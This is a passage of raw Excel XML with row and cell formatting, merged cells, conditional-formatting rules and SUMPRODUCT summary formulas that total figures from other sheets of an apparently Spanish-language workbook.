      <c r="AC1079" s="1"/>
      <c r="AD1079" s="1"/>
      <c r="AE1079" s="3"/>
      <c r="AF1079" s="3"/>
      <c r="AG1079" s="3"/>
      <c r="AH1079" s="3"/>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row>
    <row r="1080" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1080" s="15"/>
      <c r="B1080" s="3"/>
      <c r="C1080" s="3"/>
      <c r="D1080" s="1"/>
      <c r="E1080" s="1"/>
      <c r="F1080" s="3"/>
      <c r="G1080" s="3"/>
      <c r="H1080" s="3"/>
      <c r="I1080" s="3"/>
      <c r="J1080" s="3"/>
      <c r="K1080" s="1"/>
      <c r="L1080" s="1"/>
      <c r="M1080" s="1"/>
      <c r="N1080" s="1"/>
      <c r="O1080" s="1"/>
      <c r="P1080" s="1"/>
      <c r="Q1080" s="1"/>
      <c r="R1080" s="1"/>
      <c r="S1080" s="1"/>
      <c r="T1080" s="1"/>
      <c r="U1080" s="1"/>
      <c r="V1080" s="1"/>
      <c r="W1080" s="1"/>
      <c r="X1080" s="1"/>
      <c r="Y1080" s="1"/>
      <c r="Z1080" s="1"/>
      <c r="AA1080" s="1"/>
      <c r="AB1080" s="1"/>
      <c r="AC1080" s="1"/>
      <c r="AD1080" s="1"/>
      <c r="AE1080" s="3"/>
      <c r="AF1080" s="3"/>
      <c r="AG1080" s="3"/>
      <c r="AH1080" s="3"/>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row>
    <row r="1081" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1081" s="15"/>
      <c r="B1081" s="3"/>
      <c r="C1081" s="3"/>
      <c r="D1081" s="1"/>
      <c r="E1081" s="1"/>
      <c r="F1081" s="3"/>
      <c r="G1081" s="3"/>
      <c r="H1081" s="3"/>
      <c r="I1081" s="3"/>
      <c r="J1081" s="3"/>
      <c r="K1081" s="1"/>
      <c r="L1081" s="1"/>
      <c r="M1081" s="1"/>
      <c r="N1081" s="1"/>
      <c r="O1081" s="1"/>
      <c r="P1081" s="1"/>
      <c r="Q1081" s="1"/>
      <c r="R1081" s="1"/>
      <c r="S1081" s="1"/>
      <c r="T1081" s="1"/>
      <c r="U1081" s="1"/>
      <c r="V1081" s="1"/>
      <c r="W1081" s="1"/>
      <c r="X1081" s="1"/>
      <c r="Y1081" s="1"/>
      <c r="Z1081" s="1"/>
      <c r="AA1081" s="1"/>
      <c r="AB1081" s="1"/>
      <c r="AC1081" s="1"/>
      <c r="AD1081" s="1"/>
      <c r="AE1081" s="3"/>
      <c r="AF1081" s="3"/>
      <c r="AG1081" s="3"/>
      <c r="AH1081" s="3"/>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row>
    <row r="1082" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1082" s="15"/>
      <c r="B1082" s="3"/>
      <c r="C1082" s="3"/>
      <c r="D1082" s="1"/>
      <c r="E1082" s="1"/>
      <c r="F1082" s="3"/>
      <c r="G1082" s="3"/>
      <c r="H1082" s="3"/>
      <c r="I1082" s="3"/>
      <c r="J1082" s="3"/>
      <c r="K1082" s="1"/>
      <c r="L1082" s="1"/>
      <c r="M1082" s="1"/>
      <c r="N1082" s="1"/>
      <c r="O1082" s="1"/>
      <c r="P1082" s="1"/>
      <c r="Q1082" s="1"/>
      <c r="R1082" s="1"/>
      <c r="S1082" s="1"/>
      <c r="T1082" s="1"/>
      <c r="U1082" s="1"/>
      <c r="V1082" s="1"/>
      <c r="W1082" s="1"/>
      <c r="X1082" s="1"/>
      <c r="Y1082" s="1"/>
      <c r="Z1082" s="1"/>
      <c r="AA1082" s="1"/>
      <c r="AB1082" s="1"/>
      <c r="AC1082" s="1"/>
      <c r="AD1082" s="1"/>
      <c r="AE1082" s="3"/>
      <c r="AF1082" s="3"/>
      <c r="AG1082" s="3"/>
      <c r="AH1082" s="3"/>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row>
    <row r="1083" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1083" s="15"/>
      <c r="B1083" s="3"/>
      <c r="C1083" s="3"/>
      <c r="D1083" s="1"/>
      <c r="E1083" s="1"/>
      <c r="F1083" s="3"/>
      <c r="G1083" s="3"/>
      <c r="H1083" s="3"/>
      <c r="I1083" s="3"/>
      <c r="J1083" s="3"/>
      <c r="K1083" s="1"/>
      <c r="L1083" s="1"/>
      <c r="M1083" s="1"/>
      <c r="N1083" s="1"/>
      <c r="O1083" s="1"/>
      <c r="P1083" s="1"/>
      <c r="Q1083" s="1"/>
      <c r="R1083" s="1"/>
      <c r="S1083" s="1"/>
      <c r="T1083" s="1"/>
      <c r="U1083" s="1"/>
      <c r="V1083" s="1"/>
      <c r="W1083" s="1"/>
      <c r="X1083" s="1"/>
      <c r="Y1083" s="1"/>
      <c r="Z1083" s="1"/>
      <c r="AA1083" s="1"/>
      <c r="AB1083" s="1"/>
      <c r="AC1083" s="1"/>
      <c r="AD1083" s="1"/>
      <c r="AE1083" s="3"/>
      <c r="AF1083" s="3"/>
      <c r="AG1083" s="3"/>
      <c r="AH1083" s="3"/>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row>
    <row r="1084" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1084" s="15"/>
      <c r="B1084" s="3"/>
      <c r="C1084" s="3"/>
      <c r="D1084" s="1"/>
      <c r="E1084" s="1"/>
      <c r="F1084" s="3"/>
      <c r="G1084" s="3"/>
      <c r="H1084" s="3"/>
      <c r="I1084" s="3"/>
      <c r="J1084" s="3"/>
      <c r="K1084" s="1"/>
      <c r="L1084" s="1"/>
      <c r="M1084" s="1"/>
      <c r="N1084" s="1"/>
      <c r="O1084" s="1"/>
      <c r="P1084" s="1"/>
      <c r="Q1084" s="1"/>
      <c r="R1084" s="1"/>
      <c r="S1084" s="1"/>
      <c r="T1084" s="1"/>
      <c r="U1084" s="1"/>
      <c r="V1084" s="1"/>
      <c r="W1084" s="1"/>
      <c r="X1084" s="1"/>
      <c r="Y1084" s="1"/>
      <c r="Z1084" s="1"/>
      <c r="AA1084" s="1"/>
      <c r="AB1084" s="1"/>
      <c r="AC1084" s="1"/>
      <c r="AD1084" s="1"/>
      <c r="AE1084" s="3"/>
      <c r="AF1084" s="3"/>
      <c r="AG1084" s="3"/>
      <c r="AH1084" s="3"/>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row>
    <row r="1085" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1085" s="15"/>
      <c r="B1085" s="3"/>
      <c r="C1085" s="3"/>
      <c r="D1085" s="1"/>
      <c r="E1085" s="1"/>
      <c r="F1085" s="3"/>
      <c r="G1085" s="3"/>
      <c r="H1085" s="3"/>
      <c r="I1085" s="3"/>
      <c r="J1085" s="3"/>
      <c r="K1085" s="1"/>
      <c r="L1085" s="1"/>
      <c r="M1085" s="1"/>
      <c r="N1085" s="1"/>
      <c r="O1085" s="1"/>
      <c r="P1085" s="1"/>
      <c r="Q1085" s="1"/>
      <c r="R1085" s="1"/>
      <c r="S1085" s="1"/>
      <c r="T1085" s="1"/>
      <c r="U1085" s="1"/>
      <c r="V1085" s="1"/>
      <c r="W1085" s="1"/>
      <c r="X1085" s="1"/>
      <c r="Y1085" s="1"/>
      <c r="Z1085" s="1"/>
      <c r="AA1085" s="1"/>
      <c r="AB1085" s="1"/>
      <c r="AC1085" s="1"/>
      <c r="AD1085" s="1"/>
      <c r="AE1085" s="3"/>
      <c r="AF1085" s="3"/>
      <c r="AG1085" s="3"/>
      <c r="AH1085" s="3"/>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row>
    <row r="1086" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1086" s="15"/>
      <c r="B1086" s="3"/>
      <c r="C1086" s="3"/>
      <c r="D1086" s="1"/>
      <c r="E1086" s="1"/>
      <c r="F1086" s="3"/>
      <c r="G1086" s="3"/>
      <c r="H1086" s="3"/>
      <c r="I1086" s="3"/>
      <c r="J1086" s="3"/>
      <c r="K1086" s="1"/>
      <c r="L1086" s="1"/>
      <c r="M1086" s="1"/>
      <c r="N1086" s="1"/>
      <c r="O1086" s="1"/>
      <c r="P1086" s="1"/>
      <c r="Q1086" s="1"/>
      <c r="R1086" s="1"/>
      <c r="S1086" s="1"/>
      <c r="T1086" s="1"/>
      <c r="U1086" s="1"/>
      <c r="V1086" s="1"/>
      <c r="W1086" s="1"/>
      <c r="X1086" s="1"/>
      <c r="Y1086" s="1"/>
      <c r="Z1086" s="1"/>
      <c r="AA1086" s="1"/>
      <c r="AB1086" s="1"/>
      <c r="AC1086" s="1"/>
      <c r="AD1086" s="1"/>
      <c r="AE1086" s="3"/>
      <c r="AF1086" s="3"/>
      <c r="AG1086" s="3"/>
      <c r="AH1086" s="3"/>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row>
  </sheetData>
  <autoFilter ref="A2:AC79" xr:uid="{00000000-0009-0000-0000-000005000000}"/>
  <mergeCells count="22">
    <mergeCell ref="A79:C79"/>
    <mergeCell ref="AQ1:AV1"/>
    <mergeCell ref="AW1:BB1"/>
    <mergeCell ref="BC1:BH1"/>
    <mergeCell ref="BI1:BN1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:R1"/>
    <mergeCell ref="S1:X1"/>
    <mergeCell ref="Y1:AD1"/>
    <mergeCell ref="AE1:AJ1"/>
    <mergeCell ref="AK1:AP1"/>
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:C2"/>
    <mergeCell ref="D1:D2"/>
    <mergeCell ref="E1:E2"/>
    <mergeCell ref="H81:Q81"/>
    <mergeCell ref="F1:F2"/>
    <mergeCell ref="CB1:CH1"/>
    <mergeCell ref="BO1:BU1"/>
    <mergeCell ref="BV1:CA1"/>
    <mergeCell ref="K80:Q80"/>
  </mergeCells>
  <conditionalFormatting sqref="K3:K78 Q3:Q78 W3:W78">
    <cfRule type="expression" dxfId="500" priority="58">
      <formula>IF(K3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="499" priority="56">
      <formula>IF(K3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="498" priority="57">
      <formula>IF(K3=0,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L3:L78">
    <cfRule type="expression" dxfId="497" priority="37">
      <formula>IF(L3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="R3:R78">
    <cfRule type="expression" dxfId="496" priority="36">
      <formula>IF(R3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="X3:X78">
    <cfRule type="expression" dxfId="495" priority="35">
      <formula>IF(X3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="Y3:Y78">
    <cfRule type="expression" dxfId="494" priority="5">
      <formula>IF(Y3&lt;G3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="Z3">
    <cfRule type="expression" dxfId="493" priority="4">
      <formula>IF(Z3&lt;H3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AB3:AE78">
    <cfRule type="expression" dxfId="492" priority="1">
      <formula>IF(AB3&lt;J3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AC3:AC78">
    <cfRule type="expression" dxfId="491" priority="7">
      <formula>IF(AC3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="490" priority="8">
      <formula>IF(AC3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="489" priority="9">
      <formula>IF(AC3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AD3:AD78">
    <cfRule type="expression" dxfId="488" priority="6">
      <formula>IF(AD3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AF3">
    <cfRule type="expression" dxfId="487" priority="22">
      <formula>IF(AF3&lt;N3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AH3:AK78">
    <cfRule type="expression" dxfId="486" priority="14">
      <formula>IF(AH3&lt;P3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AI3:AI78">
    <cfRule type="expression" dxfId="485" priority="25">
      <formula>IF(AI3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="484" priority="26">
      <formula>IF(AI3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="483" priority="27">
      <formula>IF(AI3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AJ3:AJ78">
    <cfRule type="expression" dxfId="482" priority="24">
      <formula>IF(AJ3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AL3">
    <cfRule type="expression" dxfId="481" priority="13">
      <formula>IF(AL3&lt;T3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AN3:AP78">
    <cfRule type="expression" dxfId="480" priority="10">
      <formula>IF(AN3&lt;V3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AO3:AO78">
    <cfRule type="expression" dxfId="479" priority="16">
      <formula>IF(AO3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="478" priority="17">
      <formula>IF(AO3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="477" priority="18">
      <formula>IF(AO3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AP3:AP78">
    <cfRule type="expression" dxfId="476" priority="15">
      <formula>IF(AP3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AU3:AU78 BA3:BA78">
    <cfRule type="expression" dxfId="475" priority="53">
      <formula>IF(AU3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="474" priority="54">
      <formula>IF(AU3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="473" priority="55">
      <formula>IF(AU3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AV3:AV78">
    <cfRule type="expression" dxfId="472" priority="34">
      <formula>IF(AV3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BB3:BB78">
    <cfRule type="expression" dxfId="471" priority="33">
      <formula>IF(BB3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BG3:BG78">
    <cfRule type="expression" dxfId="470" priority="51">
      <formula>IF(BG3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="469" priority="52">
      <formula>IF(BG3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="468" priority="50">
      <formula>IF(BG3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BH3:BH78">
    <cfRule type="expression" dxfId="467" priority="32">
      <formula>IF(BH3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BM3:BM78">
    <cfRule type="expression" dxfId="466" priority="40">
      <formula>IF(BM3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="465" priority="38">
      <formula>IF(BM3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="464" priority="39">
      <formula>IF(BM3=0,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BN3:BN78">
    <cfRule type="expression" dxfId="463" priority="31">
      <formula>IF(BN3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BT3:BT78">
    <cfRule type="expression" dxfId="462" priority="42">
      <formula>IF(BT3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="461" priority="43">
      <formula>IF(BT3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="460" priority="41">
      <formula>IF(BT3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BU3:BU78">
    <cfRule type="expression" dxfId="459" priority="30">
      <formula>IF(BU3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BZ3:BZ78">
    <cfRule type="expression" dxfId="458" priority="44">
      <formula>IF(BZ3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="457" priority="45">
      <formula>IF(BZ3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="456" priority="46">
      <formula>IF(BZ3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CA3:CA78">
    <cfRule type="expression" dxfId="455" priority="29">
      <formula>IF(CA3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CG3:CG78">
    <cfRule type="expression" dxfId="454" priority="47">
      <formula>IF(CG3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="453" priority="48">
      <formula>IF(CG3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="452" priority="49">
      <formula>IF(CG3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CH3:CH78">
    <cfRule type="expression" dxfId="451" priority="28">
      <formula>IF(CH3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="1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5">
    <tabColor rgb="FFFFA7BA"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:S36"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" workbookViewId="0">
      <pane xSplit="1" ySplit="2" topLeftCell="B3" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="O37" sqref="O37"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="25.140625" style="26" customWidth="1"/>
    <col min="2" max="2" width="11" style="26" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="11.42578125" style="26" customWidth="1"/>
    <col min="4" max="4" width="11" style="26" customWidth="1"/>
    <col min="5" max="5" width="11.42578125" style="26" customWidth="1"/>
    <col min="6" max="7" width="11" style="26" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.42578125" style="26" customWidth="1"/>
    <col min="9" max="9" width="11" style="26" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="214" customWidth="1"/>
    <col min="11" max="11" width="15" style="26" customWidth="1"/>
    <col min="12" max="12" width="22.28515625" style="26" customWidth="1"/>
    <col min="13" max="13" width="15.85546875" style="26" customWidth="1"/>
    <col min="14" max="14" width="28.5703125" style="26" customWidth="1"/>
    <col min="15" max="15" width="14.5703125" style="26" customWidth="1"/>
    <col min="16" max="16384" width="11.42578125" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19">
      <c r="A1" s="146"/>
      <c r="B1" s="713" t="s">
        <v>2462</v>
      </c>
      <c r="C1" s="714"/>
      <c r="D1" s="714"/>
      <c r="E1" s="714"/>
      <c r="F1" s="714"/>
      <c r="G1" s="714"/>
      <c r="H1" s="714"/>
      <c r="I1" s="714"/>
      <c r="J1" s="714"/>
      <c r="K1" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L1" s="702"/>
      <c r="M1" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N1" s="704"/>
    </row>
    <row r="2" spans="1:19" ht="25.5" customHeight="1" thickBot="1">
      <c r="A2" s="442" t="s">
        <v>641</v>
      </c>
      <c r="B2" s="438" t="s">
        <v>0</v>
      </c>
      <c r="C2" s="21" t="s">
        <v>1</v>
      </c>
      <c r="D2" s="21" t="s">
        <v>2</v>
      </c>
      <c r="E2" s="21" t="s">
        <v>3</v>
      </c>
      <c r="F2" s="21" t="s">
        <v>1758</v>
      </c>
      <c r="G2" s="21" t="s">
        <v>1759</v>
      </c>
      <c r="H2" s="21" t="s">
        <v>1760</v>
      </c>
      <c r="I2" s="21" t="s">
        <v>1761</v>
      </c>
      <c r="J2" s="310" t="s">
        <v>1762</v>
      </c>
      <c r="K2" s="416" t="s">
        <v>2345</v>
      </c>
      <c r="L2" s="417" t="s">
        <v>2463</v>
      </c>
      <c r="M2" s="419" t="s">
        <v>2345</v>
      </c>
      <c r="N2" s="420" t="s">
        <v>2464</v>
      </c>
      <c r="S2" s="214"/>
    </row>
    <row r="3" spans="1:19" ht="15" customHeight="1">
      <c r="A3" s="443" t="s">
        <v>4463</v>
      </c>
      <c r="B3" s="717">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$E$79</f>
        <v>3573695</v>
      </c>
      <c r="C3" s="717"/>
      <c r="D3" s="717"/>
      <c r="E3" s="717"/>
      <c r="F3" s="717"/>
      <c r="G3" s="717"/>
      <c r="H3" s="717"/>
      <c r="I3" s="717"/>
      <c r="J3" s="717"/>
      <c r="K3" s="717"/>
      <c r="L3" s="717"/>
      <c r="M3" s="717"/>
      <c r="N3" s="718"/>
      <c r="S3" s="214"/>
    </row>
    <row r="4" spans="1:19" ht="15" customHeight="1">
      <c r="A4" s="444" t="s">
        <v>4464</v>
      </c>
      <c r="B4" s="719">
        <f>'Tabla 3 (Legítimo)'!$B$3</f>
        <v>78694206</v>
      </c>
      <c r="C4" s="719"/>
      <c r="D4" s="719"/>
      <c r="E4" s="719"/>
      <c r="F4" s="719"/>
      <c r="G4" s="719"/>
      <c r="H4" s="719"/>
      <c r="I4" s="719"/>
      <c r="J4" s="719"/>
      <c r="K4" s="719"/>
      <c r="L4" s="719"/>
      <c r="M4" s="719"/>
      <c r="N4" s="720"/>
      <c r="S4" s="214"/>
    </row>
    <row r="5" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A5" s="445" t="s">
        <v>4465</v>
      </c>
      <c r="B5" s="719">
        <f>$B$4+$B$3</f>
        <v>82267901</v>
      </c>
      <c r="C5" s="719"/>
      <c r="D5" s="719"/>
      <c r="E5" s="719"/>
      <c r="F5" s="719"/>
      <c r="G5" s="719"/>
      <c r="H5" s="719"/>
      <c r="I5" s="719"/>
      <c r="J5" s="719"/>
      <c r="K5" s="719"/>
      <c r="L5" s="719"/>
      <c r="M5" s="719"/>
      <c r="N5" s="720"/>
      <c r="O5" s="725" t="s">
        <v>658</v>
      </c>
      <c r="P5" s="726"/>
      <c r="S5" s="214"/>
    </row>
    <row r="6" spans="1:19" ht="15" customHeight="1">
      <c r="A6" s="478" t="s">
        <v>4453</v>
      </c>
      <c r="B6" s="439">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!K3:K78)</f>
        <v>80</v>
      </c>
      <c r="C6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!Q3:Q78)</f>
        <v>51</v>
      </c>
      <c r="D6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!W3:W78)</f>
        <v>88</v>
      </c>
      <c r="E6" s="482">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!AC3:AC78)</f>
        <v>104</v>
      </c>
      <c r="F6" s="482">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!AI3:AI78)</f>
        <v>110</v>
      </c>
      <c r="G6" s="482">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!AO3:AO78)</f>
        <v>110</v>
      </c>
      <c r="H6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!AU3:AU78)</f>
        <v>1</v>
      </c>
      <c r="I6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!BA3:BA78)</f>
        <v>56</v>
      </c>
      <c r="J6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!BG3:BG78)</f>
        <v>97</v>
      </c>
      <c r="K6" s="433">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!BM3:BM78)</f>
        <v>63.333333333333336</v>
      </c>
      <c r="L6" s="307">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!BT3:BT78)</f>
        <v>104.33333333333333</v>
      </c>
      <c r="M6" s="433">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!BZ3:BZ78)</f>
        <v>33</v>
      </c>
      <c r="N6" s="307">
        <f>SUMPRODUCT('T2 (At) S&lt;=3, FG&gt;=2'!$D3:$D$78,'T2 (At) S&lt;=3, FG&gt;=2'!CG3:CG78)</f>
        <v>73</v>
      </c>
      <c r="O6" s="723" t="s">
        <v>667</v>
      </c>
      <c r="P6" s="724"/>
      <c r="S6" s="214"/>
    </row>
    <row r="7" spans="1:19" ht="15" customHeight="1">
      <c r="A7" s="479" t="s">
        <v>4454</v>
      </c>
      <c r="B7" s="440">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - B6</f>
        <v>30</v>
      </c>
      <c r="C7" s="284">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - C6</f>
        <v>59</v>
      </c>
      <c r="D7" s="284">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - D6</f>
        <v>22</v>
      </c>
      <c r="E7" s="284">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - E6</f>
        <v>6</v>
      </c>
      <c r="F7" s="284">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - F6</f>
        <v>0</v>
      </c>
      <c r="G7" s="284">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - G6</f>
        <v>0</v>
      </c>
      <c r="H7" s="284">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - H6</f>
        <v>109</v>
      </c>
      <c r="I7" s="284">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - I6</f>
        <v>54</v>
      </c>
      <c r="J7" s="284">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - J6</f>
        <v>13</v>
      </c>
      <c r="K7" s="434">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - K6</f>
        <v>46.666666666666664</v>
      </c>
      <c r="L7" s="435">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - L6</f>
        <v>5.6666666666666714</v>
      </c>
      <c r="M7" s="434">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - M6</f>
        <v>77</v>
      </c>
      <c r="N7" s="435">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$D$79 - N6</f>
        <v>37</v>
      </c>
      <c r="O7" s="723"/>
      <c r="P7" s="724"/>
      <c r="S7" s="214"/>
    </row>
    <row r="8" spans="1:19" ht="15" customHeight="1">
      <c r="A8" s="446" t="s">
        <v>4148</v>
      </c>
      <c r="B8" s="519">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!G79</f>
        <v>37259</v>
      </c>
      <c r="C8" s="520">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!M79</f>
        <v>13179</v>
      </c>
      <c r="D8" s="520">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!S79</f>
        <v>50438</v>
      </c>
      <c r="E8" s="586">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!Y79</f>
        <v>1799319</v>
      </c>
      <c r="F8" s="586">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!AE79</f>
        <v>367811</v>
      </c>
      <c r="G8" s="586">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!AK79</f>
        <v>2157395</v>
      </c>
      <c r="H8" s="520">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!AQ79</f>
        <v>16</v>
      </c>
      <c r="I8" s="284">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!AW79</f>
        <v>25704</v>
      </c>
      <c r="J8" s="304">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!BC79</f>
        <v>76126</v>
      </c>
      <c r="K8" s="460">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!BI79</f>
        <v>656947</v>
      </c>
      <c r="L8" s="308">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!BO79</f>
        <v>1989396</v>
      </c>
      <c r="M8" s="460">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!BV79</f>
        <v>19980</v>
      </c>
      <c r="N8" s="308">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!CB79</f>
        <v>4012989</v>
      </c>
      <c r="O8" s="556"/>
      <c r="S8" s="214"/>
    </row>
    <row r="9" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A9" s="565" t="s">
        <v>4455</v>
      </c>
